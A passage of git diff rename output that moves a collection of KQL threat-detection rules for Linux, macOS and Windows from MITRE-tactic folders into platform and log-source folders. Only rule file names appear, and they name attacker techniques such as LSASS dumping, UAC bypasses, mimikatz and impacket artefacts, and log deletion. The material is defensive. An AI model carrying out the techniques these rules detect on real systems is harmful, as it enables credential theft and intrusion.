linux/process_creation}/suspicious_invocation_of_shell_via_awk_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/suspicious_invocation_of_shell_via_rsync.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/suspicious_java_children_processes.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/suspicious_nohup_execution.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/suspicious_package_installed_linux.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/syslog_clearing_or_removal_via_system_utilities.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/system_information_discovery.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/system_network_connections_discovery_linux.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/system_network_discovery_linux.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/touch_suspicious_service_file.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/triple_cross_ebpf_rootkit_execve_hijack.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/triple_cross_ebpf_rootkit_install_commands.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/ufw_force_stop_using_ufw_init.kql (100%) rename KQL/rules/{Privilege Escalation => linux/process_creation}/user_added_to_root_sudoers_group_using_usermod.kql (100%) rename KQL/rules/{Impact => linux/process_creation}/user_has_been_deleted_via_userdel.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/vim_gtfobin_abuse_linux.kql (100%) rename KQL/rules/{Persistence => macos/file_event}/macos_emond_launch_daemon.kql (100%) rename KQL/rules/{Persistence => macos/file_event}/startup_item_file_created_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/binary_padding_macos.kql (100%) rename KQL/rules/{Collection => macos/process_creation}/clipboard_data_collection_via_osascript.kql (100%) rename KQL/rules/{Persistence => macos/process_creation}/creation_of_a_local_user_account.kql (100%) rename KQL/rules/{Credential Access => macos/process_creation}/credentials_from_password_stores_keychain.kql (100%) rename KQL/rules/{Credential Access => macos/process_creation}/credentials_in_files.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/decode_base64_encoded_text_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/disable_security_tools.kql (100%) rename KQL/rules/{Exfiltration => macos/process_creation}/disk_image_creation_via_hdiutil_macos.kql (100%) rename KQL/rules/{Initial Access => macos/process_creation}/disk_image_mounting_via_hdiutil_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/file_and_directory_discovery_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/file_download_via_nscurl_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/file_time_attribute_change.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/gatekeeper_bypass_via_xattr.kql (100%) rename KQL/rules/{Privilege Escalation => macos/process_creation}/guest_account_enabled_via_sysadminctl.kql (100%) rename KQL/rules/{Collection => macos/process_creation}/gui_input_capture_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/hidden_flag_set_on_file_directory_via_chflags_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/hidden_user_creation.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/indicator_removal_on_host_clear_mac_system_logs.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/jamf_mdm_execution.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/jamf_mdm_potential_suspicious_child_process.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/jxa_in_memory_execution_via_osascript.kql (100%) rename KQL/rules/{Privilege Escalation => macos/process_creation}/launch_agent_daemon_execution_via_launchctl.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/local_groups_discovery_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/local_system_accounts_discovery_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/macos_network_service_scanning.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/macos_remote_system_discovery.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/macos_scripting_interpreter_applescript.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/network_sniffing_macos.kql (100%) rename KQL/rules/{Impact => macos/process_creation}/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/osacompile_execution_by_potentially_suspicious_applet_osascript.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/osacompile_run_only_execution.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/payload_decoded_and_decrypted_via_built_in_utilities.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/potential_base64_decoded_from_images.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/potential_discovery_activity_using_find_macos.kql (100%) rename KQL/rules/{Command and Control => macos/process_creation}/potential_in_memory_download_and_compile_of_payloads.kql (100%) rename KQL/rules/{Privilege Escalation => macos/process_creation}/potential_persistence_via_plistbuddy.kql (100%) rename KQL/rules/{Command and Control => macos/process_creation}/potential_wizardupdate_malware_infection.kql (100%) rename KQL/rules/{Command and Control => macos/process_creation}/potential_xcsset_malware_infection.kql (100%) rename KQL/rules/{Command and Control => macos/process_creation}/remote_access_tool_potential_meshagent_execution_macos.kql (100%) rename KQL/rules/{Command and Control => macos/process_creation}/remote_access_tool_renamed_meshagent_execution_macos.kql (100%) rename KQL/rules/{Persistence => macos/process_creation}/remote_access_tool_team_viewer_session_started_on_macos_host.kql (100%) rename KQL/rules/{Privilege Escalation => macos/process_creation}/root_account_enable_via_dsenableroot.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/scheduled_cron_task_job_macos.kql (100%) rename KQL/rules/{Collection => macos/process_creation}/screen_capture_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/security_software_discovery_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/space_after_filename_macos.kql (100%) rename KQL/rules/{Exfiltration => macos/process_creation}/split_a_file_into_pieces.kql (100%) rename KQL/rules/{Initial Access => macos/process_creation}/suspicious_browser_child_process_macos.kql (100%) rename KQL/rules/{Initial Access => macos/process_creation}/suspicious_execution_via_macos_script_editor.kql (100%) rename KQL/rules/{Credential Access => macos/process_creation}/suspicious_history_file_operations.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/suspicious_installer_package_child_process.kql (100%) rename KQL/rules/{Impact => macos/process_creation}/suspicious_macos_firmware_activity.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/suspicious_microsoft_office_child_process_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_information_discovery_using_ioreg.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_information_discovery_using_sw_vers.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_information_discovery_using_system_profiler.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/system_information_discovery_via_sysctl_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_integrity_protection_sip_disabled.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_integrity_protection_sip_enumeration.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_network_connections_discovery_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_network_discovery_macos.kql (100%) rename KQL/rules/{Impact => macos/process_creation}/system_shutdown_reboot_macos.kql (100%) rename KQL/rules/{Impact => macos/process_creation}/time_machine_backup_deletion_attempt_via_tmutil_macos.kql (100%) rename KQL/rules/{Impact => macos/process_creation}/time_machine_backup_disabled_via_tmutil_macos.kql (100%) rename KQL/rules/{Persistence => macos/process_creation}/user_added_to_admin_group_via_dscl.kql (100%) rename KQL/rules/{Persistence => macos/process_creation}/user_added_to_admin_group_via_dseditgroup.kql (100%) rename KQL/rules/{Persistence => macos/process_creation}/user_added_to_admin_group_via_sysadminctl.kql (100%) rename KQL/rules/{Defense Evasion => windows/builtin/security/account_management}/outgoing_logon_with_new_credentials.kql (100%) rename KQL/rules/{Execution => windows/builtin/security/account_management}/successful_account_login_via_wmi.kql (100%) rename KQL/rules/{Discovery => windows/builtin/security}/azure_ad_health_monitoring_agent_registry_keys_access.kql (100%) rename KQL/rules/{Discovery => windows/builtin/security}/azure_ad_health_service_agents_registry_keys_access.kql (100%) rename KQL/rules/{Credential Access => windows/builtin/security}/file_access_of_signal_desktop_sensitive_data.kql (100%) rename KQL/rules/{Impact => windows/builtin/security}/potential_secure_deletion_with_sdelete.kql (100%) rename KQL/rules/{Collection => windows/builtin/security}/processes_accessing_the_microphone_and_webcam.kql (100%) rename KQL/rules/{Discovery => windows/builtin/security}/sam_registry_hive_handle_request.kql (100%) rename KQL/rules/{Credential Access => windows/builtin/security}/suspicious_teams_application_related_objectacess_event.kql (100%) rename KQL/rules/{Discovery => windows/builtin/security}/syskey_registry_keys_access.kql (100%) rename KQL/rules/{Credential Access => windows/builtin/security}/wce_wceaux_dll_access.kql (100%) rename KQL/rules/{Defense Evasion => windows/builtin/security}/windows_defender_exclusion_list_modified.kql (100%) rename KQL/rules/{Persistence => windows/builtin/security}/wmi_persistence_security.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/access_to_crypto_currency_wallets_by_uncommon_applications.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/access_to_windows_credential_history_file_by_uncommon_applications.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/credential_manager_access_by_uncommon_applications.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/suspicious_file_access_to_browser_credential_storage.kql (100%) rename KQL/rules/{Persistence => windows/file/file_change}/unusual_file_modification_by_dns_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/ads_zone_identifier_deleted_by_uncommon_application.kql (100%) rename KQL/rules/{Impact => windows/file/file_delete}/backup_files_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/eventlog_evtx_file_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/exchange_powershell_cmdlet_history_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/file_deleted_via_sysinternals_sdelete.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/iis_webserver_access_logs_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/powershell_console_history_logs_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/prefetch_file_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/teamviewer_log_file_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/tomcat_webserver_logs_deleted.kql (100%) rename KQL/rules/{Persistence => windows/file/file_delete}/unusual_file_deletion_by_dns_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/_rdp_file_created_by_uncommon_application.kql (100%) rename KQL/rules/{Discovery => windows/file/file_event}/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/adsi_cache_file_creation_by_uncommon_tool.kql (100%) rename KQL/rules/{Discovery => windows/file/file_event}/advanced_ip_scanner_file_event.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/adwind_rat_jrat_file_artifact.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/anydesk_temporary_artefact.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/assembly_dll_creation_via_aspnetcompiler.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql (100%) rename KQL/rules/{Discovery => windows/file/file_event}/bloodhound_collection_files.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/created_files_by_microsoft_sync_center.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/creation_exe_for_service_with_unquoted_path.kql (100%) rename KQL/rules/{Resource Development => windows/file/file_event}/creation_of_a_diagcab.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/creation_of_non_existent_system_dll.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/cred_dump_tools_dropped_files.kql (69%) rename KQL/rules/{Execution => windows/file/file_event}/csexec_service_file_creation.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/dll_search_order_hijackig_via_additional_space_in_path.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/dpapi_backup_keys_and_certificate_export_activity_ioc.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/drop_binaries_into_spool_drivers_color_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/dynamic_csharp_compile_artefact.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/evtx_created_in_uncommon_location.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/file_creation_in_suspicious_directory_by_msdt_exe.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/file_with_uncommon_extension_created_by_an_office_application.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/files_with_system_dll_name_in_unsuspected_locations.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/files_with_system_process_name_in_unsuspected_locations.kql (100%) rename KQL/rules/{Discovery => windows/file/file_event}/gathernetworkinfo_vbs_reconnaissance_script_output.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/gotoassist_temporary_installation_artefact.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_crackmapexec_file_indicators.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_dumpert_process_dumper_default_file.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_impacket_file_indicators.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/hacktool_inveigh_execution_artefacts.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_mimikatz_kirbi_file_creation.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_nppspy_hacktool_usage.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/hacktool_powerup_write_hijack_dll.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_quarkspwdump_dump_file.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_safetykatz_dump_indicator.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_typical_hivenightmare_sam_file_export.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/hijack_legit_rdp_session_to_move_laterally.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/installation_of_teamviewer_desktop.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/iso_file_created_within_temp_folders.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/iso_or_image_mount_indicator_in_recent_files.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/legitimate_application_dropped_archive.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/legitimate_application_dropped_executable.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/legitimate_application_dropped_script.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/livekd_driver_creation.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/livekd_driver_creation_by_uncommon_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/livekd_kernel_memory_dump_file_created.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/lsass_process_dump_artefact_in_crashdumps_folder.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/lsass_process_memory_dump_creation_via_taskmgr_exe.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/lsass_process_memory_dump_files.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/malicious_powershell_scripts_filecreation.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/new_custom_shim_database_created.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/new_outlook_macro_created.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/ntds_dit_created.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/ntds_dit_creation_by_uncommon_parent_process.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/ntds_dit_creation_by_uncommon_process.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/ntds_exfiltration_filename_patterns.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/octopus_scanner_malware.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/office_macro_file_creation.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/office_macro_file_creation_from_suspicious_process.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/office_macro_file_download.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/onenote_attachment_file_dropped_in_suspicious_location.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/pcre_net_package_temp_files.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/pdf_file_created_by_regedit_exe.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_binary_or_script_dropper_via_powershell.kql (100%) rename KQL/rules/{Lateral Movement => windows/file/file_event}/potential_dcom_internetexplorer_application_dll_hijack.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/potential_file_extension_spoofing_using_right_to_left_override.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/potential_initial_access_via_dll_search_order_hijacking.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_persistence_attempt_via_errorhandler_cmd.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_persistence_via_microsoft_office_add_in.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_persistence_via_microsoft_office_startup_folder.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_persistence_via_notepad_plugins.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_persistence_via_outlook_form.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/potential_privilege_escalation_attempt_via_exe_local_technique.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/potential_ripzip_attack_on_startup_folder.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/potential_sam_database_dump.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/potential_startup_shortcut_persistence_via_powershell_exe.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_suspicious_powershell_module_file_created.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_webshell_creation_on_static_website.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/potential_winnti_dropper_activity.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/potentially_suspicious_dmp_hdmp_file_creation.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/potentially_suspicious_wdac_policy_file_creation.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/powershell_module_file_created.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/powershell_module_file_created_by_non_powershell_process.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/powershell_profile_modification.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/powershell_script_dropped_via_powershell_exe.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/process_explorer_driver_creation_by_non_sysinternals_binary.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/process_monitor_driver_creation_by_non_sysinternals_binary.kql (100%) rename KQL/rules/{Lateral Movement => windows/file/file_event}/psexec_remote_execution_file_artefact.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/psexec_service_file_creation.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/psscriptpolicytest_creation_by_uncommon_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/publisher_attachment_file_dropped_in_suspicious_location.kql (100%) rename KQL/rules/{Exfiltration => windows/file/file_event}/rclone_config_file_creation.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/remcom_service_file_creation.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/remote_access_tool_screenconnect_temporary_file.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/renamed_vscode_code_tunnel_execution_file_indicator.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/scr_file_write_event.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/screenconnect_temporary_installation_artefact.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/self_extraction_directive_file_created_in_potentially_suspicious_location.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/startup_folder_file_write.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/suspicious_aspx_file_drop_by_exchange.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/suspicious_binaries_and_scripts_in_public_folder.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/suspicious_binary_writes_via_anydesk.kql (100%) rename KQL/rules/{Impact => windows/file/file_event}/suspicious_creation_txt_file_in_user_desktop.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_creation_with_colorcpl.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/suspicious_deno_file_written_from_remote_source.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/suspicious_desktop_ini_action.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/suspicious_desktopimgdownldr_target_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_double_extension_files.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_executable_file_creation.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/suspicious_file_created_in_outlook_temporary_directory.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/suspicious_file_created_in_perflogs.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_file_created_via_onenote_application.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_file_creation_in_uncommon_appdata_folder.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/suspicious_file_drop_by_exchange.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/suspicious_file_write_to_sharepoint_layouts_directory.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/suspicious_file_write_to_webapps_root_directory.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_files_in_default_gpo_folder.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/suspicious_get_variable_exe_creation.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/suspicious_interactive_powershell_as_system.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_lnk_double_extension_file_created.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/suspicious_msexchangemailboxreplication_aspx_write.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/suspicious_outlook_macro_created.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/suspicious_procexp152_sys_file_created_in_tmp.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/suspicious_scheduled_task_write_to_system32_tasks.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/suspicious_screensaver_binary_file_creation.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/suspicious_startup_folder_persistence.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/teamviewer_remote_session.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_abusing_winsat_path_parsing_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_consent_and_comctl32_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_eventvwr.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/uac_bypass_using_idiagnostic_profile_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_ieinstal_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_msconfig_token_modification_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_net_code_profiler_on_mmc.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_ntfs_reparse_point_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uac_bypass_using_windows_media_player_file.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/uefi_persistence_via_wpbbin_filecreation.kql (100%) rename KQL/rules/{Resource Development => windows/file/file_event}/uncommon_file_created_in_office_startup_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/uncommon_file_creation_by_mysql_daemon_process.kql (100%) rename KQL/rules/{Resource Development => windows/file/file_event}/vhd_image_download_via_browser.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/visual_studio_code_tunnel_remote_file_creation.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/vscode_powershell_profile_modification.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/werfault_lsass_process_memory_dump.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/windows_binaries_write_suspicious_extensions.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/windows_shell_scripting_application_file_write_to_suspicious_folder.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/windows_terminal_profile_settings_modification_by_uncommon_process.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/winrar_creating_files_in_startup_locations.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/winsxs_executable_file_creation_by_non_system_process.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/wmi_persistence_script_event_consumer_file_write.kql (100%) rename KQL/rules/{Lateral Movement => windows/file/file_event}/wmiexec_default_output_file.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/wmiprvse_wbemcomn_dll_hijack_file.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/writing_local_admin_share.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/wscript_or_cscript_dropper_file.kql (100%) rename KQL/rules/{Execution => windows/image_load}/abusable_dll_potential_sideloading_from_suspicious_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/amsi_dll_loaded_via_lolbin_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/aruba_network_service_potential_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/baaupdate_exe_suspicious_dll_load.kql (100%) rename KQL/rules/{Execution => windows/image_load}/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql (100%) rename KQL/rules/{Execution => windows/image_load}/clr_dll_loaded_via_office_applications.kql (100%) rename KQL/rules/{Credential Access => windows/image_load}/credui_dll_loaded_by_uncommon_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/dll_load_by_system_process_from_suspicious_locations.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/dll_loaded_from_suspicious_location_via_cmspt_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/dll_sideloading_of_shellchromeapi_dll.kql (100%) rename KQL/rules/{Execution => windows/image_load}/dotnet_assembly_dll_loaded_via_office_application.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/dotnet_clr_dll_loaded_by_scripting_applications.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/fax_service_dll_search_order_hijack.kql (100%) rename KQL/rules/{Execution => windows/image_load}/gac_dll_loaded_via_office_applications.kql (100%) rename KQL/rules/{Command and Control => windows/image_load}/hacktool_silenttrinity_stager_dll_load.kql (100%) rename KQL/rules/{Impact => windows/image_load}/load_of_rstrtmgr_dll_by_a_suspicious_process.kql (100%) rename KQL/rules/{Impact => windows/image_load}/load_of_rstrtmgr_dll_by_an_uncommon_process.kql (100%) rename KQL/rules/{Execution => windows/image_load}/microsoft_excel_add_in_loaded_from_uncommon_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/microsoft_office_dll_sideload.kql (100%) rename KQL/rules/{Execution => windows/image_load}/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql (100%) rename KQL/rules/{Execution => windows/image_load}/mmc_loading_script_engines_dlls.kql (100%) rename KQL/rules/{Execution => windows/image_load}/pcre_net_package_image_load.kql (100%) rename 